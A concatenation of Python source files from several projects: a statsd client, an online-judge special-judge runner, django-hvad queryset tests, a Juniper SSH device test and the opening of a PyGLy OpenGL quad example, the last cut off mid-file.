:keyword name: The name for this client
:type name: str
:keyword connection: The connection to use, will be automatically created if
not given
:type connection: :class:`~statsd.connection.Connection`
>>> client = Client('test')
>>> client
<Client:test@<Connection[localhost:8125] P(1.0)>>
>>> client.get_client('spam')
<Client:test.spam@<Connection[localhost:8125] P(1.0)>>
'''
name = None
connection = None
def __init__(self, name, connection=None):
self.name = self._get_name(name)
if not connection:
connection = statsd.Connection()
self.connection = connection
self.logger = logging.getLogger(
'%s.%s' % (__name__, self.__class__.__name__))
@classmethod
def _get_name(cls, *name_parts):
name_parts = [compat.to_str(x) for x in name_parts if x]
return '.'.join(name_parts)
def get_client(self, name=None, class_=None):
'''Get a (sub-)client with a separate namespace
This way you can create a global/app based client with subclients
per class/function
:keyword name: The name to use, if the name for this client was `spam`
and the `name` argument is `eggs` than the resulting name will be
`spam.eggs`
:type name: str
:keyword class_: The :class:`~statsd.client.Client` subclass to use
(e.g. :class:`~statsd.timer.Timer` or
:class:`~statsd.counter.Counter`)
:type class_: :class:`~statsd.client.Client`
'''
name = self._get_name(self.name, name)
if not class_:
class_ = self.__class__
return class_(
name=name,
connection=self.connection,
)
def get_average(self, name=None):
'''Shortcut for getting an :class:`~statsd.average.Average` instance
:keyword name: See :func:`~statsd.client.Client.get_client`
:type name: str
'''
return self.get_client(name=name, class_=statsd.Average)
def get_counter(self, name=None):
'''Shortcut for getting a :class:`~statsd.counter.Counter` instance
:keyword name: See :func:`~statsd.client.Client.get_client`
:type name: str
'''
return self.get_client(name=name, class_=statsd.Counter)
def get_gauge(self, name=None):
'''Shortcut for getting a :class:`~statsd.gauge.Gauge` instance
:keyword name: See :func:`~statsd.client.Client.get_client`
:type name: str
'''
return self.get_client(name=name, class_=statsd.Gauge)
def get_raw(self, name=None):
'''Shortcut for getting a :class:`~statsd.raw.Raw` instance
:keyword name: See :func:`~statsd.client.Client.get_client`
:type name: str
'''
return self.get_client(name=name, class_=statsd.Raw)
def get_timer(self, name=None):
'''Shortcut for getting a :class:`~statsd.timer.Timer` instance
:keyword name: See :func:`~statsd.client.Client.get_client`
:type name: str
'''
return self.get_client(name=name, class_=statsd.Timer)
def __repr__(self):
return '<%s:%s@%r>' % (
self.__class__.__name__,
self.name,
self.connection,
)
def _send(self, data):
return self.connection.send(data)
|
data/QingdaoU/OnlineJudge/judge/spj_client.py
|
import os
import judger
WA = 1
AC = 0
SPJ_ERROR = -1
def file_exists(path):
return os.path.exists(path)
def spj(path, max_cpu_time, max_memory, in_path, user_out_path):
if file_exists(in_path) and file_exists(user_out_path):
result = judger.run(path=path, in_file=in_path, out_file="/tmp/spj.out",
max_cpu_time=max_cpu_time, max_memory=max_memory,
args=[in_path, user_out_path], env=["PATH=" + os.environ.get("PATH", "")],
use_sandbox=True, use_nobody=True)
if result["signal"] == 0 and result["exit_status"] in [AC, WA, SPJ_ERROR]:
result["spj_result"] = result["exit_status"]
else:
result["spj_result"] = SPJ_ERROR
return result
else:
raise ValueError("in_path or user_out_path does not exist")
|
data/KristianOellegaard/django-hvad/hvad/tests/query.py
|
import django
from django.db import connection
from django.db.models import Count
from django.db.models.query_utils import Q
from django.utils import translation
from hvad.test_utils.data import NORMAL, STANDARD
from hvad.test_utils.testcase import HvadTestCase, minimumDjangoVersion
from hvad.test_utils.project.app.models import Normal, AggregateModel, Standard, SimpleRelated
from hvad.test_utils.fixtures import NormalFixture, StandardFixture
class FilterTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_simple_filter(self):
qs = Normal.objects.language('en').filter(shared_field__contains='2')
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj.translated_field, NORMAL[2].translated_field['en'])
qs = Normal.objects.language('ja').filter(shared_field__contains='1')
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj.translated_field, NORMAL[1].translated_field['ja'])
def test_translated_filter(self):
qs = Normal.objects.language('en').filter(translated_field__contains='English')
self.assertEqual(qs.count(), self.normal_count)
obj1, obj2 = qs
self.assertEqual(obj1.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj1.translated_field, NORMAL[1].translated_field['en'])
self.assertEqual(obj2.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj2.translated_field, NORMAL[2].translated_field['en'])
def test_fallbacks_filter(self):
(Normal.objects.language('en')
.filter(shared_field=NORMAL[1].shared_field)
.delete_translations())
with translation.override('en'):
qs = Normal.objects.language().fallbacks()
with self.assertNumQueries(2):
self.assertEqual(qs.count(), self.normal_count)
self.assertEqual(len(qs), self.normal_count)
with self.assertNumQueries(0):
self.assertCountEqual((obj.pk for obj in qs), tuple(self.normal_id.values()))
self.assertCountEqual((obj.language_code for obj in qs), self.translations)
def test_all_languages_filter(self):
with self.assertNumQueries(2):
qs = Normal.objects.language('all').filter(shared_field__contains='Shared')
self.assertEqual(qs.count(), self.normal_count * len(self.translations))
self.assertCountEqual((obj.shared_field for obj in qs),
(NORMAL[1].shared_field,
NORMAL[2].shared_field) * 2)
self.assertCountEqual((obj.translated_field for obj in qs),
(NORMAL[1].translated_field['en'],
NORMAL[1].translated_field['ja'],
NORMAL[2].translated_field['en'],
NORMAL[2].translated_field['ja']))
with self.assertNumQueries(2):
qs = Normal.objects.language('all').filter(translated_field__contains='English')
self.assertEqual(qs.count(), self.normal_count)
self.assertCountEqual((obj.shared_field for obj in qs),
(NORMAL[1].shared_field,
NORMAL[2].shared_field))
self.assertCountEqual((obj.translated_field for obj in qs),
(NORMAL[1].translated_field['en'],
NORMAL[2].translated_field['en']))
with self.assertNumQueries(2):
qs = Normal.objects.language('all').filter(translated_field__contains='1')
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj.translated_field, NORMAL[1].translated_field['en'])
def test_deferred_language_filter(self):
with translation.override('ja'):
qs = Normal.objects.language().filter(translated_field__contains='English')
with translation.override('en'):
self.assertEqual(qs.count(), self.normal_count)
obj1, obj2 = qs
self.assertEqual(obj1.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj1.translated_field, NORMAL[1].translated_field['en'])
self.assertEqual(obj2.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj2.translated_field, NORMAL[2].translated_field['en'])
class ExtraTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_simple_extra(self):
qs = Normal.objects.language('en').extra(select={'test_extra': '2 + 2'})
self.assertEqual(qs.count(), self.normal_count)
self.assertEqual(int(qs[0].test_extra), 4)
class QueryCachingTests(HvadTestCase, NormalFixture):
normal_count = 2
def _try_all_cache_using_methods(self, qs, length):
with self.assertNumQueries(0):
x = 0
for obj in qs: x += 1
self.assertEqual(x, length)
with self.assertNumQueries(0):
qs[0]
with self.assertNumQueries(0):
self.assertEqual(qs.exists(), length != 0)
with self.assertNumQueries(0):
self.assertEqual(qs.count(), length)
with self.assertNumQueries(0):
self.assertEqual(len(qs), length)
with self.assertNumQueries(0):
self.assertEqual(bool(qs), length != 0)
def test_iter_caches(self):
with translation.override('en'):
index = 0
qs = Normal.objects.language().filter(pk=self.normal_id[1])
for obj in qs:
index += 1
self.assertEqual(index, 1)
self._try_all_cache_using_methods(qs, 1)
def test_pickling_caches(self):
import pickle
with translation.override('en'):
qs = Normal.objects.language().filter(pk=self.normal_id[1])
pickle.dumps(qs)
self._try_all_cache_using_methods(qs, 1)
def test_len_caches(self):
with translation.override('en'):
qs = Normal.objects.language().filter(pk=self.normal_id[1])
self.assertEqual(len(qs), 1)
self._try_all_cache_using_methods(qs, 1)
def test_bool_caches(self):
with translation.override('en'):
qs = Normal.objects.language().filter(pk=self.normal_id[1])
self.assertTrue(qs)
self._try_all_cache_using_methods(qs, 1)
class IterTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_simple_iter(self):
with translation.override('en'):
with self.assertNumQueries(1):
for index, obj in enumerate(Normal.objects.language(), 1):
self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
self.assertEqual(obj.translated_field, NORMAL[index].translated_field['en'])
with translation.override('ja'):
with self.assertNumQueries(1):
for index, obj in enumerate(Normal.objects.language(), 1):
self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
self.assertEqual(obj.translated_field, NORMAL[index].translated_field['ja'])
def test_iter_unique_reply(self):
with translation.override('en'):
self.assertEqual(len(Normal.objects.all()), len(Normal.objects.untranslated()))
def test_iter_deferred_language(self):
with translation.override('en'):
qs = Normal.objects.language()
with translation.override('ja'):
for index, obj in enumerate(qs, 1):
self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
self.assertEqual(obj.translated_field, NORMAL[index].translated_field['ja'])
class UpdateTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_update_shared(self):
NEW_SHARED = 'new shared'
n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
with self.assertNumQueries(1 if connection.features.update_can_self_select else 2):
Normal.objects.language('en').update(shared_field=NEW_SHARED)
new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
self.assertEqual(new1.shared_field, NEW_SHARED)
self.assertEqual(new1.translated_field, n1.translated_field)
self.assertEqual(new2.shared_field, NEW_SHARED)
self.assertEqual(new2.translated_field, n2.translated_field)
newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
self.assertEqual(newja1.shared_field, NEW_SHARED)
self.assertEqual(newja2.shared_field, NEW_SHARED)
self.assertEqual(newja1.translated_field, ja1.translated_field)
self.assertEqual(newja2.translated_field, ja2.translated_field)
def test_update_translated(self):
NEW_TRANSLATED = 'new translated'
n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
with self.assertNumQueries(1):
Normal.objects.language('en').update(translated_field=NEW_TRANSLATED)
new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
self.assertEqual(new1.shared_field, n1.shared_field)
self.assertEqual(new2.shared_field, n2.shared_field)
self.assertEqual(new1.translated_field, NEW_TRANSLATED)
self.assertEqual(new2.translated_field, NEW_TRANSLATED)
newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
self.assertEqual(newja1.shared_field, ja1.shared_field)
self.assertEqual(newja2.shared_field, ja2.shared_field)
self.assertEqual(newja1.translated_field, ja1.translated_field)
self.assertEqual(newja2.translated_field, ja2.translated_field)
def test_update_mixed(self):
NEW_SHARED = 'new shared'
NEW_TRANSLATED = 'new translated'
ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
with self.assertNumQueries(2 if connection.features.update_can_self_select else 3):
Normal.objects.language('en').update(
shared_field=NEW_SHARED, translated_field=NEW_TRANSLATED
)
new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
self.assertEqual(new1.shared_field, NEW_SHARED)
self.assertEqual(new1.translated_field, NEW_TRANSLATED)
self.assertEqual(new2.shared_field, NEW_SHARED)
self.assertEqual(new2.translated_field, NEW_TRANSLATED)
newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
self.assertEqual(newja1.shared_field, NEW_SHARED)
self.assertEqual(newja2.shared_field, NEW_SHARED)
self.assertEqual(newja1.translated_field, ja1.translated_field)
self.assertEqual(newja2.translated_field, ja2.translated_field)
def test_update_deferred_language(self):
NEW_TRANSLATED = 'new translated'
n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
with translation.override('ja'):
qs = Normal.objects.language()
with translation.override('en'):
with self.assertNumQueries(1):
qs.update(translated_field=NEW_TRANSLATED)
new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
self.assertEqual(new1.shared_field, n1.shared_field)
self.assertEqual(new2.shared_field, n2.shared_field)
self.assertEqual(new1.translated_field, NEW_TRANSLATED)
self.assertEqual(new2.translated_field, NEW_TRANSLATED)
newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
self.assertEqual(newja1.shared_field, ja1.shared_field)
self.assertEqual(newja2.shared_field, ja2.shared_field)
self.assertEqual(newja1.translated_field, ja1.translated_field)
self.assertEqual(newja2.translated_field, ja2.translated_field)
def test_update_fallbacks(self):
qs = Normal.objects.language().fallbacks()
with self.assertNumQueries(1 if connection.features.update_can_self_select else 2):
qs.filter(shared_field=NORMAL[1].shared_field).update(shared_field='updated')
self.assertEqual(Normal.objects.language('ja').get(shared_field='updated').pk, self.normal_id[1])
self.assertEqual(Normal.objects.language('en').get(shared_field='updated').pk, self.normal_id[1])
class ValuesListTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_values_list_translated(self):
values = Normal.objects.language('en').values_list('translated_field', flat=True)
values_list = list(values)
self.assertCountEqual(values_list, [NORMAL[1].translated_field['en'],
NORMAL[2].translated_field['en']])
def test_values_list_shared(self):
values = Normal.objects.language('en').values_list('shared_field', flat=True)
values_list = list(values)
self.assertCountEqual(values_list, [NORMAL[1].shared_field,
NORMAL[2].shared_field])
def test_values_list_mixed(self):
values = Normal.objects.language('en').values_list('shared_field', 'translated_field')
values_list = list(values)
check = [
(NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
(NORMAL[2].shared_field, NORMAL[2].translated_field['en']),
]
self.assertCountEqual(values_list, check)
def test_values_list_deferred_language(self):
with translation.override('ja'):
qs = Normal.objects.language()
with translation.override('en'):
values = qs.values_list('shared_field', 'translated_field')
values_list = list(values)
check = [
(NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
(NORMAL[2].shared_field, NORMAL[2].translated_field['en']),
]
self.assertCountEqual(values_list, check)
def test_values_list_language_all(self):
values = (Normal.objects.language('all').filter(shared_field=NORMAL[1].shared_field)
.values_list('shared_field', 'translated_field'))
values_list = list(values)
check = [
(NORMAL[1].shared_field, NORMAL[1].translated_field['ja']),
(NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
]
self.assertCountEqual(values_list, check)
class ValuesTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_values_shared(self):
values = Normal.objects.language('en').values('shared_field')
values_list = list(values)
check = [
{'shared_field': NORMAL[1].shared_field},
{'shared_field': NORMAL[2].shared_field},
]
self.assertCountEqual(values_list, check)
def test_values_translated(self):
values = Normal.objects.language('en').values('translated_field')
values_list = list(values)
check = [
{'translated_field': NORMAL[1].translated_field['en']},
{'translated_field': NORMAL[2].translated_field['en']},
]
self.assertCountEqual(values_list, check)
def test_values_mixed(self):
values = Normal.objects.language('en').values('translated_field', 'shared_field')
values_list = list(values)
check = [
{'translated_field': NORMAL[1].translated_field['en'],
'shared_field': NORMAL[1].shared_field},
{'translated_field': NORMAL[2].translated_field['en'],
'shared_field': NORMAL[2].shared_field},
]
self.assertCountEqual(values_list, check)
def test_values_post_language(self):
values = Normal.objects.language().values('shared_field').language('en')
values_list = list(values)
check = [
{'shared_field': NORMAL[1].shared_field},
{'shared_field': NORMAL[2].shared_field},
]
self.assertCountEqual(values_list, check)
def test_values_post_filter(self):
qs = Normal.objects.language('en').values('shared_field')
values = qs.filter(shared_field=NORMAL[1].shared_field)
values_list = list(values)
check = [
{'shared_field': NORMAL[1].shared_field},
]
self.assertCountEqual(values_list, check)
def test_values_deferred_language(self):
with translation.override('ja'):
qs = Normal.objects.language()
with translation.override('en'):
values = qs.values('translated_field')
values_list = list(values)
check = [
{'translated_field': NORMAL[1].translated_field['en']},
{'translated_field': NORMAL[2].translated_field['en']},
]
self.assertCountEqual(values_list, check)
def test_values_language_all(self):
values = (Normal.objects.language('all').filter(shared_field=NORMAL[1].shared_field)
.values('shared_field', 'translated_field'))
values_list = list(values)
check = [
{'shared_field': NORMAL[1].shared_field,
'translated_field': NORMAL[1].translated_field['ja']},
{'shared_field': NORMAL[1].shared_field,
'translated_field': NORMAL[1].translated_field['en']},
]
self.assertCountEqual(values_list, check)
class InBulkTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_empty_in_bulk(self):
with self.assertNumQueries(0):
result = Normal.objects.language('en').in_bulk([])
self.assertEqual(len(result), 0)
def test_in_bulk(self):
pk1, pk2 = self.normal_id[1], self.normal_id[2]
with self.assertNumQueries(1):
result = Normal.objects.language('en').in_bulk([pk1, pk2])
self.assertCountEqual((pk1, pk2), result)
self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
self.assertEqual(result[pk1].language_code, 'en')
self.assertEqual(result[pk2].shared_field, NORMAL[2].shared_field)
self.assertEqual(result[pk2].translated_field, NORMAL[2].translated_field['en'])
self.assertEqual(result[pk2].language_code, 'en')
def test_untranslated_in_bulk(self):
pk1 = self.normal_id[1]
with translation.override('ja'):
with self.assertNumQueries(2):
result = Normal.objects.untranslated().in_bulk([pk1])
self.assertCountEqual((pk1,), result)
self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['ja'])
self.assertEqual(result[pk1].language_code, 'ja')
def test_fallbacks_in_bulk(self):
(Normal.objects.language('en')
.filter(shared_field=NORMAL[2].shared_field)
.delete_translations())
with self.assertNumQueries(1):
pk1, pk2 = self.normal_id[1], self.normal_id[2]
result = Normal.objects.language('en').fallbacks('de', 'ja').in_bulk([pk1, pk2])
self.assertCountEqual((pk1, pk2), result)
self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
self.assertEqual(result[pk1].language_code, 'en')
self.assertEqual(result[pk2].shared_field, NORMAL[2].shared_field)
self.assertEqual(result[pk2].translated_field, NORMAL[2].translated_field['ja'])
self.assertEqual(result[pk2].language_code, 'ja')
def test_all_languages_in_bulk(self):
with self.assertRaises(ValueError):
Normal.objects.language('all').in_bulk([self.normal_id[1]])
def test_in_bulk_deferred_language(self):
pk1 = self.normal_id[1]
with translation.override('ja'):
qs = Normal.objects.language()
with translation.override('en'):
result = qs.in_bulk([pk1])
self.assertCountEqual((pk1,), result)
self.assertEqual(result[pk1].shared_field, NORMAL[1].shared_field)
self.assertEqual(result[pk1].translated_field, NORMAL[1].translated_field['en'])
self.assertEqual(result[pk1].language_code, 'en')
class DeleteTests(HvadTestCase, NormalFixture):
normal_count = 2
def test_delete_all(self):
Normal.objects.all().delete()
self.assertEqual(Normal.objects.count(), 0)
self.assertEqual(Normal._meta.translations_model.objects.count(), 0)
def test_delete_translation(self):
self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
Normal.objects.language('en').delete_translations()
self.assertEqual(Normal.objects.untranslated().count(), 2)
self.assertEqual(Normal._meta.translations_model.objects.count(), 2)
Normal.objects.language('ja').delete_translations()
self.assertEqual(Normal.objects.untranslated().count(), 2)
self.assertEqual(Normal._meta.translations_model.objects.count(), 0)
def test_filtered_delete_translation(self):
self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
(Normal.objects.language('en')
.filter(shared_field=NORMAL[1].shared_field)
.delete_translations())
self.assertEqual(Normal.objects.untranslated().count(), 2)
self.assertEqual(Normal._meta.translations_model.objects.count(), 3)
(Normal.objects.language('ja')
.filter(translated_field=NORMAL[2].translated_field['ja'])
.delete_translations())
self.assertEqual(Normal.objects.untranslated().count(), 2)
self.assertEqual(Normal._meta.translations_model.objects.count(), 2)
def test_delete_translation_deferred_language(self):
self.assertEqual(Normal._meta.translations_model.objects.count(), 4)
with translation.override('ja'):
qs = Normal.objects.language()
with translation.override('en'):
qs.delete_translations()
self.assertEqual(Normal.objects.language('ja').count(), 2)
self.assertEqual(Normal.objects.language('en').count(), 0)
def test_delete_fallbacks(self):
qs = Normal.objects.language().fallbacks()
qs.filter(shared_field=NORMAL[1].shared_field).delete()
self.assertEqual(Normal.objects.language('ja').count(), self.normal_count - 1)
self.assertEqual(Normal.objects.language('en').count(), self.normal_count - 1)
class GetTranslationFromInstanceTests(HvadTestCase, NormalFixture):
normal_count = 1
def test_simple(self):
en = Normal.objects.language('en').get()
ja_trans = en.translations.get_language('ja')
ja = Normal.objects.language('ja').get(pk=en.pk)
self.assertEqual(en.shared_field, NORMAL[1].shared_field)
self.assertEqual(en.translated_field, NORMAL[1].translated_field['en'])
self.assertRaises(AttributeError, getattr, ja_trans, 'shared_field')
self.assertEqual(ja_trans.translated_field, NORMAL[1].translated_field['ja'])
self.assertEqual(ja.shared_field, NORMAL[1].shared_field)
self.assertEqual(ja.translated_field, NORMAL[1].translated_field['ja'])
def test_cached(self):
en = Normal.objects.untranslated().prefetch_related('translations').get()
with self.assertNumQueries(0):
ja_trans = en.translations.get_language('ja')
ja = Normal.objects.language('ja').get(pk=en.pk)
self.assertEqual(en.shared_field, NORMAL[1].shared_field)
self.assertEqual(en.translated_field, NORMAL[1].translated_field['en'])
self.assertRaises(AttributeError, getattr, ja_trans, 'shared_field')
self.assertEqual(ja_trans.translated_field, NORMAL[1].translated_field['ja'])
self.assertEqual(ja.shared_field, NORMAL[1].shared_field)
self.assertEqual(ja.translated_field, NORMAL[1].translated_field['ja'])
def test_not_exist(self):
en = Normal.objects.untranslated().get()
with self.assertRaises(Normal.DoesNotExist):
en.translations.get_language('tt')
en = Normal.objects.untranslated().prefetch_related('translations').get()
with self.assertRaises(Normal.DoesNotExist):
en.translations.get_language('tt')
class AggregateTests(HvadTestCase):
def test_aggregate(self):
from django.db.models import Avg
AggregateModel.objects.language("en").create(number=10, translated_number=20)
AggregateModel.objects.language("en").create(number=0, translated_number=0)
self.assertEqual(AggregateModel.objects.language("en").aggregate(Avg("number")), {'number__avg': 5})
self.assertEqual(AggregateModel.objects.language("en").aggregate(Avg("translated_number")), {'translated_number__avg': 10})
self.assertEqual(AggregateModel.objects.language("en").aggregate(num=Avg("number")), {'num': 5})
self.assertEqual(AggregateModel.objects.language("en").aggregate(tnum=Avg("translated_number")), {'tnum': 10})
class AnnotateTests(HvadTestCase, StandardFixture, NormalFixture):
normal_count = 2
standard_count = 4
def test_annotate(self):
qs = Normal.objects.language('en').annotate(Count('standards'))
self.assertEqual(len(qs), self.normal_count)
self.assertEqual(qs[0].standards__count, 2)
self.assertEqual(qs[1].standards__count, 2)
qs = Normal.objects.language('en').annotate(foo=Count('standards'))
self.assertEqual(len(qs), self.normal_count)
self.assertEqual(qs[0].foo, 2)
self.assertEqual(qs[1].foo, 2)
with self.assertRaises(ValueError):
qs = Normal.objects.language('en').annotate(Count('standards'), standards__count=Count('standards'))
class NotImplementedTests(HvadTestCase):
def test_notimplemented(self):
baseqs = SimpleRelated.objects.language('en')
self.assertRaises(NotImplementedError, baseqs.defer, 'shared_field')
self.assertRaises(NotImplementedError, baseqs.only)
self.assertRaises(NotImplementedError, baseqs.bulk_create, [])
self.assertRaises(NotImplementedError, baseqs.select_related)
if django.VERSION >= (1, 7):
self.assertRaises(NotImplementedError, baseqs.update_or_create)
class MinimumVersionTests(HvadTestCase):
def test_versions(self):
qs = SimpleRelated.objects.language('en')
if django.VERSION < (1, 7):
self.assertRaises(AttributeError, getattr, qs, 'update_or_create')
class ExcludeTests(HvadTestCase, NormalFixture):
normal_count = 1
def test_defer(self):
qs = Normal.objects.language('en').exclude(translated_field=NORMAL[1].translated_field['en'])
self.assertEqual(qs.count(), 0)
def test_fallbacks_exclude(self):
(Normal.objects.language('en')
.filter(shared_field=NORMAL[1].shared_field)
.delete_translations())
qs = (Normal.objects.language('en')
.fallbacks('de', 'ja')
.exclude(shared_field=NORMAL[1].shared_field))
self.assertEqual(qs.count(), 0)
def test_all_languages_exclude(self):
qs = Normal.objects.language('all').exclude(translated_field=NORMAL[1].translated_field['en'])
self.assertEqual(qs.count(), 1)
self.assertEqual(qs[0].translated_field, NORMAL[1].translated_field['ja'])
def test_invalid_all_languages_exclude(self):
with self.assertRaises(ValueError):
Normal.objects.language().exclude(language_code='all')
class ComplexFilterTests(HvadTestCase, StandardFixture, NormalFixture):
normal_count = 2
standard_count = 2
def test_qobject_filter(self):
shared_contains_one = Q(shared_field__contains='1')
shared_contains_two = Q(shared_field__contains='2')
qs = Normal.objects.language('en').filter(shared_contains_two)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj.translated_field, NORMAL[2].translated_field['en'])
qs = (Normal.objects.language('ja').filter(Q(shared_contains_one | shared_contains_two))
.order_by('shared_field'))
self.assertEqual(qs.count(), 2)
obj = qs[0]
self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
self.assertEqual(obj.translated_field, NORMAL[1].translated_field['ja'])
obj = qs[1]
self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
self.assertEqual(obj.translated_field, NORMAL[2].translated_field['ja'])
def test_aware_qobject_filter(self):
from hvad.utils import get_translation_aware_manager
manager = get_translation_aware_manager(Standard)
normal_one = Q(normal_field=STANDARD[1].normal_field)
normal_two = Q(normal_field=STANDARD[2].normal_field)
shared_one = Q(normal__shared_field=NORMAL[STANDARD[1].normal].shared_field)
translated_one_en = Q(normal__translated_field=NORMAL[STANDARD[1].normal].translated_field['en'])
translated_two_en = Q(normal__translated_field=NORMAL[STANDARD[2].normal].translated_field['en'])
with translation.override('en'):
qs = manager.filter(shared_one)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(translated_one_en)
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(Q(normal_one & shared_one & translated_one_en))
self.assertEqual(qs.count(), 1)
obj = qs[0]
self.assertEqual(obj.normal_field, STANDARD[1].normal_field)
qs = manager.filter(Q(normal_one & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(shared_one & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(translated_one_en & translated_two_en))
self.assertEqual(qs.count(), 0)
qs = manager.filter(Q(normal_one | translated_one_en))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(shared_one | translated_one_en))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(normal_one | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(shared_one | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(translated_one_en | translated_two_en))
self.assertEqual(qs.count(), 2)
qs = manager.filter(Q(normal_one & (translated_one_en | translated_two_en)))
self.assertEqual(qs.count(), 1)
qs = manager.filter(Q(normal_two & (translated_one_en | translated_two_en)))
self.assertEqual(qs.count(), 1)
qs = manager.filter(shared_one & ~translated_one_en)
self.assertEqual(qs.count(), 0)
qs = manager.filter(shared_one & ~translated_two_en)
self.assertEqual(qs.count(), 1)
def test_defer(self):
qs = Normal.objects.language('en').complex_filter({})
self.assertEqual(qs.count(), self.normal_count)
self.assertRaises(NotImplementedError,
Normal.objects.language('en').complex_filter,
Q(shared_field=NORMAL[1].shared_field))
|
data/Juniper/py-junos-eznc/tests/functional/test_device_ssh.py
|
'''
@author: rsherman
'''
import unittest
from nose.plugins.attrib import attr
from jnpr.junos import Device
@attr('functional')
class TestDeviceSsh(unittest.TestCase):
def tearDown(self):
self.dev.close()
def test_device_open_default_key(self):
self.dev = Device('pabst.englab.juniper.net')
self.dev.open()
self.assertEqual(self.dev.connected, True)
def test_device_open_key_pass(self):
self.dev = Device(host='pabst.englab.juniper.net', ssh_private_key_file='/var/lib/jenkins/.ssh/passkey', passwd='password')
self.dev.open()
self.assertEqual(self.dev.connected, True)
|
data/adamlwgriffiths/PyGLy/pygly/examples/renderable_textured_quad.py
|
import textwrap
import numpy
from OpenGL import GL
from pygly.shader import Shader, VertexShader, FragmentShader, ShaderProgram
from pygly.vertex_buffer import VertexBuffer, BufferAttributes, GenericAttribute, VertexAttribute, TextureCoordAttribute
from pygly.vertex_array import VertexArray
from pyrr import geometry
vertices, indices = geometry.create_quad(scale=(5.0,5.0), st=True, dtype='float32')
vertices = vertices[indices]
vertices.dtype = [
('position', 'float32', (3,)),
('texture_coord', 'float32', (2,)),
]
def create( core_profile = True ):
if core_profile:
return CoreQuad()
else:
return LegacyQuad()
class CoreQuad( object ):
vertex_shader = textwrap.dedent( """
// input
in vec3 in_position;
in vec2 in_uv;
uniform mat4 model_view;
uniform mat4 projection;
// shared
out vec2 ex_uv;
void main(void)
{
// apply projection and model view matrix to vertex
gl_Position = projection * model_view * vec4( in_position, 1.0 );
ex_uv = in_uv;
}
""" )
fragment_shader = textwrap.dedent( """
// shared
in vec2 ex_uv;
uniform sampler2D in_diffuse_texture;
// output
out vec4 fragColor;
void main(void)
{
// set colour of each fragment
fragColor = texture( in_diffuse_texture, ex_uv );
}
""" )
def __init__( self ):
super( CoreQuad, self ).__init__()
global vertices
self.shader = ShaderProgram(
VertexShader( self.vertex_shader ),
FragmentShader( self.fragment_shader )
)
self.buffer = VertexBuffer(
